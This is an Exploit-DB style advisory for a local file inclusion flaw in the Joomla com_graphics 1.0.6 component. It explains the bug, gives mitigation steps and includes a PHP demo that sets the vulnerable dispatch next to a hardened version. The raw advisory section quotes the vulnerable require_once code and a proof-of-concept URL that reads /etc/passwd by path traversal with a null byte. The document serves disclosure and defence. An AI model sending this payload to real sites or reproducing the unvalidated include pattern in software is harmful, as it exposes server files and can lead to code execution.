Vendor: com_graphics
By: wishnusakti + inc0mp13te (HH)
CVSS: 8.8 (HIGH)
Vulnerability class: Local File Inclusion (LFI)
CWE: CWE-98
Product Name: com_graphics
Affected Version From: 1.0.6
Affected Version To: 1.0.6
Patch Exists: NO
Related CWE: N/A
CPE: a:htmlcoderhelper:com_graphics:1.0.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

Joomla Component graphics (com_graphics) v1.0.6 LFI Vulnerability

The component's entry script, components/com_graphics/graphics.php, reads the controller request parameter and splices it directly into a require_once() call, prefixing the component's controllers directory and appending ".php". No path validation is applied, so a value containing "../" sequences walks out of that directory, and a trailing null byte (%00) truncates the path before the ".php" suffix on PHP versions earlier than 5.3.4. An unauthenticated attacker who sends such a request makes the server include, and thereby disclose, any file readable by the web-server process, such as /etc/passwd or Joomla's configuration.php. Because the file is included rather than merely read, any PHP code it contains is executed; if an attacker can get PHP code into a file on the host (an upload, a log, a session file), the same flaw yields code execution.

Mitigation:

Never build an include path from request data. Restrict the controller parameter to a fixed list of controller names shipped with the component and fall back to the default controller when the value is not on the list. At minimum, read the value with JRequest::getCmd('controller') instead of getVar(): the cmd filter keeps only letters, digits, underscore, dot and hyphen and strips leading dots, so traversal sequences and null bytes do not survive. As a second layer, resolve the final path with realpath() and confirm it lies inside the controllers directory before requiring it. Since no vendor patch exists, operators should also run PHP 5.3.4 or later (which rejects null bytes in file paths), set open_basedir to the Joomla tree, and give the web-server account read access only to the files Joomla needs.
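As an added example (not code from the advisory or from the com_graphics component), the following PHP script puts the vulnerable dispatch pattern next to a hardened version that applies the allowlist-plus-containment approach, and exercises both with the advisory's payload. The controller names, the temporary directory standing in for JPATH_COMPONENT, and the plain string argument standing in for JRequest are assumptions made for the demo; it needs PHP 7.1 or later and runs stand-alone from the command line.

```php
<?php
// Added example, not code from the original advisory or from the com_graphics
// component: the vulnerable dispatch pattern from graphics.php next to a
// hardened replacement, exercised from the CLI with constructed inputs.
// Joomla's JPATH_COMPONENT and JRequest are replaced by a temporary directory
// and a plain string argument so the script runs stand-alone.

// Vulnerable pattern: the raw request value is spliced into the include path.
// "../" walks out of controllers/, and a trailing "\0" drops the ".php"
// suffix on PHP < 5.3.4. Only the path is built here; nothing is required.
function vulnerable_controller_path(string $componentDir, string $controller): string
{
    return $componentDir . DIRECTORY_SEPARATOR . 'controllers'
         . DIRECTORY_SEPARATOR . $controller . '.php';
}

// Hardened replacement: an allowlist of controller names fixed at development
// time, plus a realpath() containment check as a second layer.
function safe_controller_path(string $componentDir, string $controller): ?string
{
    static $allowed = ['graphics', 'category']; // assumed controller names for the demo

    // Strict comparison: "graphics\0" or "../x" can never equal a listed name.
    if (!in_array($controller, $allowed, true)) {
        return null;
    }

    $controllersDir = realpath($componentDir . DIRECTORY_SEPARATOR . 'controllers');
    if ($controllersDir === false) {
        return null;
    }
    $prefix   = $controllersDir . DIRECTORY_SEPARATOR;
    $resolved = realpath($prefix . $controller . '.php');

    // The resolved file must exist and must sit below controllers/.
    if ($resolved === false || strncmp($resolved, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $resolved;
}

// ---- stand-alone demonstration with a constructed component directory ----
$componentDir   = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'com_graphics_demo_' . getmypid();
$controllersDir = $componentDir . DIRECTORY_SEPARATOR . 'controllers';
mkdir($controllersDir, 0700, true);
$legit = $controllersDir . DIRECTORY_SEPARATOR . 'graphics.php';
file_put_contents($legit, "<?php // legitimate controller\n");

$inputs = [
    'graphics',                                   // normal request
    str_repeat('../', 9) . 'etc/passwd' . "\0",   // the advisory's PoC, URL-decoded
    '../../../../../configuration',               // traversal without null byte: ".php" still appended
    'graphics.php',                               // near miss: not on the allowlist
];
foreach ($inputs as $value) {
    printf("controller=%s\n", str_replace("\0", '\0', $value));
    printf("  vulnerable include path: %s\n",
        str_replace("\0", '\0', vulnerable_controller_path($componentDir, $value)));
    printf("  hardened result:         %s\n",
        safe_controller_path($componentDir, $value) ?? 'REJECTED');
}

unlink($legit);
rmdir($controllersDir);
rmdir($componentDir);
```

For the PoC input the vulnerable path ends in "etc/passwd" followed by a null byte and ".php", which is exactly what pre-5.3.4 PHP truncates at the null byte; the hardened function rejects every input that is not a listed controller name before any path is built, and the realpath() check guards against the allowlist later being loosened to something that can still escape the directory.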

Exploit-DB raw data:

 ================================================================================================

 Title    : Joomla Component graphics (com_graphics) v1.0.6 LFI Vulnerability
 Vendor   : http://htmlcoderhelper.com/
 Download : http://en.sourceforge.jp/frs/g_redir.php?m=jaist&f=%2Fjoomlagraphics%2Fcom_graphics.zip

 Date     : 27 April 2010 - GMT +07:00 Jakarta, Indonesia
 Author   : wishnusakti + inc0mp13te (HH)
 Contact  : evileyes60117[at]yahoo.com

 ================================================================================================

 [+] Vulnerable

     ./components/com_graphics/graphics.php

     // Require specific controller if requested
     // (the 'controller' value comes straight from the request with no path validation)
     if($controller = JRequest::getVar( 'controller' )) {
         require_once( JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php' );
     }


 [+] Exploit

     http://[site]/[path]/index.php?option=com_graphics&controller=[LFI]

 [+] PoC

     http://localhost/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00

 ================================================================================================

 Very Special thanks :
     Penghuni #nob0dy priv8 Server
     (ander, NoGe, zxvf, kaka11, s4va, meylira, Jack, aJe, Unyil, cheche angela zhang, madonk, & Bot² Scan :D)
 
     en Semua Komunitas Hacking Tanah Air
     Peace Yo :)

to all my friends : mywisdom, aurell, hafiz, xco, kiddies, xshadow, gblack, petimati, 
                    cakill, krembis, biakkobar, hendri_note, xshadow, local_disaster, pradipta yoarsa


 ================================================================================================

# ./wishnusakti #.inc0mp13te